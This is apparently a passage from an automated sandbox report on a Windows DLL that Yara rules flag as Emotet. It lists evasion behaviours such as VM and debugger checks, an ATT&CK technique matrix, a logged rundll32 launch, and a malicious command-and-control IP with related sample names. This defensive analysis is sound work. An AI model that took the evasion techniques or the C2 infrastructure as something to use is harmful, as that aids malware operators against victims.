                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-10064
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                      Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 44 6e 75 85 11 47-bd a2 bb ed 21 43 9f 89VMware7,1
                      Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
                      Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                      Source: regsvr32.exe, 00000006.00000003.428890553.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428918999.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.743734401.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.597712126.000001F4AF8E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.597577635.000001F4AF8AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.743745789.0000023FCBA5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.743863470.0000023FCBAC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000B.00000002.743473344.0000026495002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                      Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                      Source: regsvr32.exe, 00000006.00000002.743677609.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428821113.0000000000D92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPz
                      Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 44 6e 75 85 11 47-bd a2 bb ed 21 43 9f 89
                      Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                      Source: svchost.exe, 0000001C.00000002.744179874.0000023FCC32D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
                      Source: svchost.exe, 0000001C.00000002.744313864.0000023FCCA54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1Ld?
                      Source: svchost.exe, 0000000B.00000002.743545213.0000026495028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: svchost.exe, 0000001C.00000002.743845132.0000023FCBAB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWsx
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9B20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8CA9B20E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9B7BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FF8CA9B7BE8
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9BD318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8CA9BD318
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9B20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8CA9B20E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9B6550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8CA9B6550

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,2_2_00007FF8CA9BDF98
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FF8CA9BC39C
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FF8CA9BC7F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FF8CA9BDF20
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FF8CA9BDF3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FF8CA9BC8C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FF8CA9BC834
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_00007FF8CA9BC450
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FF8CA9BE1E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,2_2_00007FF8CA9BC934
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_00007FF8CA9BC16C
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FF8CA9BC2B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FF8CA9BC6E4
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9B4558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00007FF8CA9B4558
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9BE6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00007FF8CA9BE6C0
                      Source: svchost.exe, 0000001C.00000002.744269389.0000023FCC3ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe
                      Source: svchost.exe, 0000001C.00000002.744269389.0000023FCC3ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 2.2.regsvr32.exe.680000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.17092640000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.f20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.680000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.1a5a5ea0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.17092640000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.1a5a5ea0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.f20000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.356219703.0000017092640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.358233793.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.356042845.000001A5A5EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.743858456.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Native API                      		1
                      DLL Side-Loading                      		111
                      Process Injection                      		2
                      Masquerading                      		OS Credential Dumping2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium11
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading                      		13
                      Virtualization/Sandbox Evasion                      		LSASS Memory1
                      Query Registry                      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                      Ingress Tool Transfer                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                      Process Injection                      		Security Account Manager141
                      Security Software Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Hidden Files and Directories                      		NTDS13
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information                      		LSA Secrets2
                      Process Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Regsvr32                      		Cached Domain Credentials1
                      Remote System Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Rundll32                      		DCSync2
                      File and Directory Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc Filesystem34
                      System Information Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      File Deletion                      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 626484 Sample: x4ByCNJqst.dll Startdate: 14/05/2022 Architecture: WINDOWS Score: 80 35 Antivirus detection for URL or domain 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Yara detected Emotet 2->39 7 loaddll64.exe 1 2->7         started        9 svchost.exe 2->9         started        12 svchost.exe 2->12         started        14 4 other processes 2->14 process3 signatures4 16 regsvr32.exe 5 7->16         started        19 cmd.exe 1 7->19         started        21 rundll32.exe 2 7->21         started        23 rundll32.exe 7->23         started        41 Query firmware table information (likely to detect VMs) 9->41 process5 signatures6 33 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->33 25 regsvr32.exe 16->25         started        29 rundll32.exe 2 19->29         started        process7 dnsIp8 31 23.239.0.12, 443, 49789 LINODE-APLinodeLLCUS United States 25->31 43 System process connects to network (likely due to code injection or exploit) 25->43 45 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->45 signatures9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      x4ByCNJqst.dll38%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.regsvr32.exe.680000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      3.2.rundll32.exe.17092640000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      4.2.rundll32.exe.1a5a5ea0000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      6.2.regsvr32.exe.f20000.1.unpack100%AviraHEUR/AGEN.1215493Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://23.239.0.12/_100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://23.239.0.12/0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/true
                      • URL Reputation: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/_regsvr32.exe, 00000006.00000003.428908993.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428869428.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.743719059.0000000000DC2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.428821113.0000000000D92000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.ver)svchost.exe, 00000010.00000002.597712126.000001F4AF8E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.743897114.0000023FCBADD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://help.disneyplus.com.svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://support.hotspotshield.com/svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.hotspotshield.com/terms/svchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.pango.co/privacysvchost.exe, 00000010.00000003.584551631.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584742502.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584455774.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584636899.000001F4B061A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584466682.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584705944.000001F4B0602000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.584669781.000001F4B061A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://disneyplus.com/legal.svchost.exe, 00000010.00000003.585822779.000001F4B0190000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585922922.000001F4B01B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.585841484.000001F4B01A1000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          23.239.0.12
                          		unknownUnited States
                          		63949LINODE-APLinodeLLCUStrue

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:626484
                          Start date and time: 14/05/202204:44:142022-05-14 04:44:14 +02:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 9m 39s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:x4ByCNJqst.dll
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Run name:Run with higher sleep bypass
                          Number of analysed new started processes analysed:30
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal80.troj.evad.winDLL@19/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 49
                          • Number of non-executed functions: 215
                          Cookbook Comments:
                          • Found application associated with file extension: .dll
                          • Adjust boot time
                          • Enable AMSI
                          • Sleeps bigger than 120000ms are automatically reduced to 1000ms

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, UsoClient.exe, wuapihost.exe
                          • Excluded IPs from analysis (whitelisted): 20.223.24.244, 51.104.136.2
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, settings-prod-neu-2.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, www.msftconnecttest.com, img-prod-cms-rt-microsoft-com.akamaized.net, atm-settingsfe-prod-geo.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          23.239.0.12Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                            RuqTBW6t32.dllGet hashmaliciousBrowse
                              yj81rxDZIp.dllGet hashmaliciousBrowse
                                x4ByCNJqst.dllGet hashmaliciousBrowse
                                  lc4KFeS296.dllGet hashmaliciousBrowse
                                    36yjawe0S4.dllGet hashmaliciousBrowse
                                      Ns2al4764F.dllGet hashmaliciousBrowse
                                        cX9TLU9gnx.dllGet hashmaliciousBrowse
                                          56vvRzZVQI.dllGet hashmaliciousBrowse
                                            8PnsJpuSdb.dllGet hashmaliciousBrowse
                                              yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                bsST3VDo8G.dllGet hashmaliciousBrowse
                                                  wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                    yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                      bsST3VDo8G.dllGet hashmaliciousBrowse
                                                        6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                          2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                            sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                              40Gbs8Qkm6.dllGet hashmaliciousBrowse
                                                                wdxJNuEzAd.dllGet hashmaliciousBrowse

                                                                  Domains

                                                                  No context

                                                                  ASNs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  LINODE-APLinodeLLCUSXp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  lc4KFeS296.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  36yjawe0S4.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  Ns2al4764F.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  40Gbs8Qkm6.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  51c64c77e60f3980eea90869b68c58a8Xp7X1Yf3CM.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  RuqTBW6t32.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yj81rxDZIp.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  x4ByCNJqst.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  lc4KFeS296.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  36yjawe0S4.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  Ns2al4764F.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  cX9TLU9gnx.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  56vvRzZVQI.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  8PnsJpuSdb.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  yaEOuyT3Sg.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  bsST3VDo8G.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  6ez8Bx2x6f.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  2Bgxulf6QF.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  sEfyaa5VPQ.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  40Gbs8Qkm6.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12
                                                                  wdxJNuEzAd.dllGet hashmaliciousBrowse
                                                                  • 23.239.0.12

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  No created / dropped files found

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Entropy (8bit):6.482091984293291
                                                                  TrID:
                                                                  • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                  • Win64 Executable (generic) (12005/4) 10.17%
